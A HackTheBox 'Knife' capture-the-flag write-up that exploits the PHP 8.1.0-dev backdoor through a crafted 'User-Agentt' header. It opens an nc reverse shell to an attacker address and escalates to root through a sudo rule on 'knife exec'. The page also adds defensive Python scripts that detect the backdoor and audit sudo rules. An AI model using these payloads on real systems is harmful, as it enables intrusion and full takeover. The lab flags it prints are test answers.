Knife is a HackTheBox machine. On this machine we find that it is running a development version of PHP that was affected by a backdoor; through it we gain access after launching a reverse shell. Finally we escalate privileges using the sudo permissions on the Knife tool with a Ruby script.
Name | Knife
OS | Linux
Points | 20
Difficulty | Easy
IP | 10.10.10.242
Maker | MrKN16H7
Matrix

```json
{
"type":"radar",
"data":{
"labels":["Enumeration","Real-Life","CVE","Custom Explotation","CTF-Like"],
"datasets":[
{
"label":"User Rate", "data":[4.4, 3.8, 4.9, 5.1, 6.2],
"backgroundColor":"rgba(75, 162, 189,0.5)",
"borderColor":"#4ba2bd"
},
{
"label":"Maker Rate",
"data":[0, 0, 0, 0, 0],
"backgroundColor":"rgba(154, 204, 20,0.5)",
"borderColor":"#9acc14"
}
]
},
"options": {"scale": {"ticks": {"backdropColor":"rgba(0,0,0,0)"},
"angleLines":{"color":"rgba(255, 255, 255,0.6)"},
"gridLines":{"color":"rgba(255, 255, 255,0.6)"}
}
}
}
```
RECON
NMAP
A port scan with nmap shows the http port (80) and the ssh port (22) open.

```
# Nmap 7.91 scan initiated Wed May 26 19:44:57 2021 as: nmap -Pn -sV -sC -p22,80 -oN scan_ports 10.10.10.242
Nmap scan report for 10.10.10.242 (10.10.10.242)
Host is up (0.098s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 26 19:45:11 2021 -- 1 IP address (1 host up) scanned in 13.39 seconds
```
HTTP
We find an apparently static page.
GOBUSTER
We use gobuster to search for directories and files, but it only shows one address we already know and another that we cannot access remotely.

```
π ~/htb/knife ❯ gobuster dir -u http://10.10.10.242/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -q -t 30 -x php,html,txt,json,xml
/index.php (Status: 200) [Size: 5815]
/server-status (Status: 403) [Size: 277]
```
In the site's response headers we find `PHP/8.1.0-dev`. Researching this version we find an exploit that allows command execution through a header; it is related to a backdoor that was recently detected in a commit of the PHP development repository, which allows commands to be executed remotely.

```
HTTP/1.1 200 OK
Date: Thu, 27 May 2021 00:22:54 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Content-Type: text/html; charset=UTF-8
```
USER - JAMES
Command execution is achieved by sending a command in the header `User-Agentt: zerodiumsystem('whoami');`, which runs the command and shows its output. In the curl output we see the `whoami` command executed as the user "james".

```
π ~/htb/knife ❯ curl -s http://10.10.10.242/ -H "User-Agentt: zerodiumsystem('whoami');"| html2text
james
* About EMA
* /
* Patients
* /
* Hospitals
* /
* Providers
* /
* E-MSO
***** At EMA we're taking care to a whole new level . . . *****
****** Taking care of our ******
```
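The two artefacts this section relies on, the `X-Powered-By: PHP/8.1.0-dev` banner and the misspelled `User-Agentt` header carrying the `zerodium` marker, are also what a defender would look for in captured traffic. The following Python script is an added example, not part of the original writeup: it parses raw HTTP messages and flags both. The detection rules (banner string, header name, marker prefix) are the assumptions behind it, and the sample messages are constructed, with the response mirroring the headers shown above.

```python
"""Spot the PHP 8.1.0-dev backdoor in captured HTTP traffic (added example).

Detection logic assumed here (not from the writeup): the backdoored build
identifies itself with 'X-Powered-By: PHP/8.1.0-dev', and the backdoor fires on
a request carrying the misspelled header 'User-Agentt' whose value contains the
marker 'zerodium', evaluating the text after the marker as PHP. The sample
messages below are constructed for this example.
"""
from __future__ import annotations

BACKDOORED_BANNER = "PHP/8.1.0-dev"
TRIGGER_HEADER = "user-agentt"   # header names are compared case-insensitively
TRIGGER_MARKER = "zerodium"


def parse_http_head(raw: str) -> tuple[str, dict[str, str]]:
    """Return the start line and a lower-cased header-name -> value map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers: dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue            # malformed header line: ignore rather than crash
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def inspect_request(raw_request: str) -> list[str]:
    """Findings for a client request; empty list when nothing matches."""
    findings: list[str] = []
    start_line, headers = parse_http_head(raw_request)
    value = headers.get(TRIGGER_HEADER)
    if value is None:
        return findings
    # No real client sends 'User-Agentt'; the header name alone is worth a look.
    findings.append(f"non-standard 'User-Agentt' header on '{start_line}'")
    idx = value.lower().find(TRIGGER_MARKER)
    if idx != -1:
        payload = value[idx + len(TRIGGER_MARKER):]
        findings.append(f"backdoor trigger; PHP passed to eval: {payload!r}")
    return findings


def inspect_response(raw_response: str) -> list[str]:
    """Findings for a server response: flags the development-build banner."""
    _, headers = parse_http_head(raw_response)
    if headers.get("x-powered-by") == BACKDOORED_BANNER:
        return [f"server advertises backdoored build {BACKDOORED_BANNER}"]
    return []


# Constructed samples (the response mirrors the headers shown in the writeup).
BENIGN_REQUEST = (
    "GET / HTTP/1.1\r\nHost: 10.10.10.242\r\n"
    "User-Agent: Mozilla/5.0\r\n\r\n"
)
TRIGGER_REQUEST = (
    "GET / HTTP/1.1\r\nHost: 10.10.10.242\r\n"
    "User-Agentt: zerodiumsystem('whoami');\r\n\r\n"
)
DEV_RESPONSE = (
    "HTTP/1.1 200 OK\r\nServer: Apache/2.4.41 (Ubuntu)\r\n"
    "X-Powered-By: PHP/8.1.0-dev\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n"
)

if __name__ == "__main__":
    for label, msg, fn in (("benign request", BENIGN_REQUEST, inspect_request),
                           ("trigger request", TRIGGER_REQUEST, inspect_request),
                           ("response", DEV_RESPONSE, inspect_response)):
        print(label, "->", fn(msg) or "clean")
```

The header-name check fires on its own because `User-Agentt` is never sent by legitimate clients, so it is a cheap first-stage signal even if an attacker varies the payload; the banner check is the inventory side, telling you which hosts run the tainted build and need the binary replaced.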
We launch a reverse shell, obtain a shell and the flag user.txt.

```
# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 8081 >/tmp/f
james@knife:/$ whoami
whoami
james
james@knife:/$ cd
cd
james@knife:~$ ll
ll
total 40
drwxr-xr-x 5 james james 4096 May 18 13:20 ./
drwxr-xr-x 3 root root 4096 May 6 14:44 ../
lrwxrwxrwx 1 james james 9 May 10 16:23 .bash_history -> /dev/null
-rw-r--r-- 1 james james 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 james james 3771 Feb 25 2020 .bashrc
drwx------ 2 james james 4096 May 6 14:45 .cache/
drwxrwxr-x 3 james james 4096 May 6 16:32 .local/
-rw-r--r-- 1 james james 807 Feb 25 2020 .profile
-rw-rw-r-- 1 james james 66 May 7 14:16 .selected_editor
drwx------ 2 james james 4096 May 18 13:20 .ssh/
-r-------- 1 james james 33 May 26 20:25 user.txt
james@knife:~$ cat user.txt
cat user.txt
7b3e1804cce95710f8730ca6fb1a086f
james@knife:~$
```
PRIVILEGE ESCALATION
Running `sudo -l -l` we see that we have root permissions (sudo) to run the `knife` command.

```
james@knife:~$ sudo -l -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
Sudoers entry:
RunAsUsers: root
Options: !authenticate
Commands:
/usr/bin/knife
james@knife:~$ file /usr/bin/knife
/usr/bin/knife: symbolic link to /opt/chef-workstation/bin/knife
james@knife:~$ file /opt/chef-workstation/bin/knife
/opt/chef-workstation/bin/knife: a /opt/chef-workstation/embedded/bin/ruby --disable-gems script, ASCII text executable
james@knife:~$ ls -lah /opt/chef-workstation/bin/knife
-rwxr-xr-x 1 root root 12K Feb 15 22:06 /opt/chef-workstation/bin/knife
james@knife:~$
```
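The sudo rule above is the whole escalation path: it runs as root, needs no password (`!authenticate`), and the target is a tool that evaluates Ruby on request. As an added example, not part of the original writeup, the following Python script parses the long-format `sudo -l -l` output and flags rules of that shape, so an administrator can audit hosts for the same misconfiguration. The `SHELL_CAPABLE` list is an assumption for illustration (knife is on it because `knife exec` runs an arbitrary Ruby script with the caller's privileges); `SAMPLE_PAGE` is the listing shown above and `SAMPLE_BENIGN` is constructed.

```python
"""Audit 'sudo -l -l' output for root rules over tools that can run arbitrary code.

Added example, not from the writeup. SHELL_CAPABLE is an assumed, illustrative
list; knife belongs on it because 'knife exec' evaluates a Ruby script with the
caller's privileges. SAMPLE_PAGE is the listing from the writeup; SAMPLE_BENIGN
is constructed.
"""
from __future__ import annotations

import os
from dataclasses import dataclass, field

# Programs that hand the caller a shell or an interpreter (assumed list).
SHELL_CAPABLE = {"knife", "ruby", "python3", "perl", "bash", "sh", "vim", "find", "less"}


@dataclass
class SudoRule:
    runas_users: list[str] = field(default_factory=list)
    options: list[str] = field(default_factory=list)
    commands: list[str] = field(default_factory=list)


def _csv(line: str) -> list[str]:
    """Split 'Key: a, b' into ['a', 'b']."""
    return [x.strip() for x in line.split(":", 1)[1].split(",") if x.strip()]


def parse_sudo_list(output: str) -> list[SudoRule]:
    """Parse the long format printed by 'sudo -l -l' into SudoRule objects."""
    rules: list[SudoRule] = []
    current: SudoRule | None = None
    in_commands = False
    for raw in output.splitlines():
        line = raw.strip()
        if line == "Sudoers entry:":
            current = SudoRule()
            rules.append(current)
            in_commands = False
        elif current is None:
            continue                      # Defaults block before the first entry
        elif line.startswith("RunAsUsers:"):
            current.runas_users = _csv(line)
        elif line.startswith("Options:"):
            current.options = _csv(line)
        elif line.startswith("Commands:"):
            in_commands = True
        elif in_commands and line:
            current.commands.append(line)  # one command (with optional args) per line
    return rules


def assess(rules: list[SudoRule]) -> list[str]:
    """Return one finding per command that gives root-level arbitrary code execution."""
    findings: list[str] = []
    for rule in rules:
        as_root = any(u in ("root", "ALL") for u in rule.runas_users)
        if not as_root:
            continue
        no_auth = "!authenticate" in rule.options
        for cmd in rule.commands:
            prog = "ALL" if cmd == "ALL" else os.path.basename(cmd.split()[0])
            if prog != "ALL" and prog not in SHELL_CAPABLE:
                continue
            how = "without a password" if no_auth else "after authentication"
            findings.append(f"{'critical' if no_auth else 'high'}: {cmd} runs as root {how}; "
                            f"{prog} can execute arbitrary code")
    return findings


# Listing from the writeup (indentation as 'sudo -l -l' prints it).
SAMPLE_PAGE = """\
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User james may run the following commands on knife:

Sudoers entry:
    RunAsUsers: root
    Options: !authenticate
    Commands:
\t/usr/bin/knife
"""

# Constructed: same rule shape, but over a program that cannot spawn code.
SAMPLE_BENIGN = """\
User alice may run the following commands on host:

Sudoers entry:
    RunAsUsers: root
    Options: !authenticate
    Commands:
\t/usr/bin/id
"""

if __name__ == "__main__":
    for name, sample in (("page", SAMPLE_PAGE), ("benign", SAMPLE_BENIGN)):
        print(name, "->", assess(parse_sudo_list(sample)) or "no findings")
```

The fix on a real host is to drop the rule, or at least restrict it to the exact subcommand and arguments the user needs and require a password; a bare `/usr/bin/knife` entry cannot be made safe by argument matching because `knife exec` accepts any script.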
We use `knife exec` with a script to get a root shell and the flag root.txt.

```
james@knife:~$ echo "system('/bin/bash')" > script.rb
james@knife:~$ cat script.rb
system('/bin/bash')
james@knife:~$ sudo /usr/bin/knife exec script.rb
root@knife:/home/james# whoami
root
root@knife:/home/james# id
uid=0(root) gid=0(root) groups=0(root)
root@knife:/home/james# cd
root@knife:~# ll
total 56
drwx------ 7 root root 4096 May 18 13:26 ./
drwxr-xr-x 20 root root 4096 May 18 13:25 ../
lrwxrwxrwx 1 root root 9 May 8 16:43 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3137 May 7 11:12 .bashrc
drwx------ 2 root root 4096 May 7 14:47 .cache/
drwx------ 3 root root 4096 May 18 13:20 .chef/
-rwxr-xr-x 1 root root 105 May 8 16:46 delete.sh*
drwxr-xr-x 3 root root 4096 May 7 11:13 .local/
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw------- 1 root root 1024 May 8 11:13 .rnd
-r-------- 1 root root 33 May 26 20:25 root.txt
-rw-r--r-- 1 root root 66 May 8 16:46 .selected_editor
drwxr-xr-x 3 root root 4096 May 6 14:44 snap/
drwx------ 2 root root 4096 May 6 14:44 .ssh/
-rw------- 1 root root 2413 May 18 13:25 .viminfo
root@knife:~# cat root.txt
e2eee2ca199ac8ea06e9578969576706
root@knife:~#
```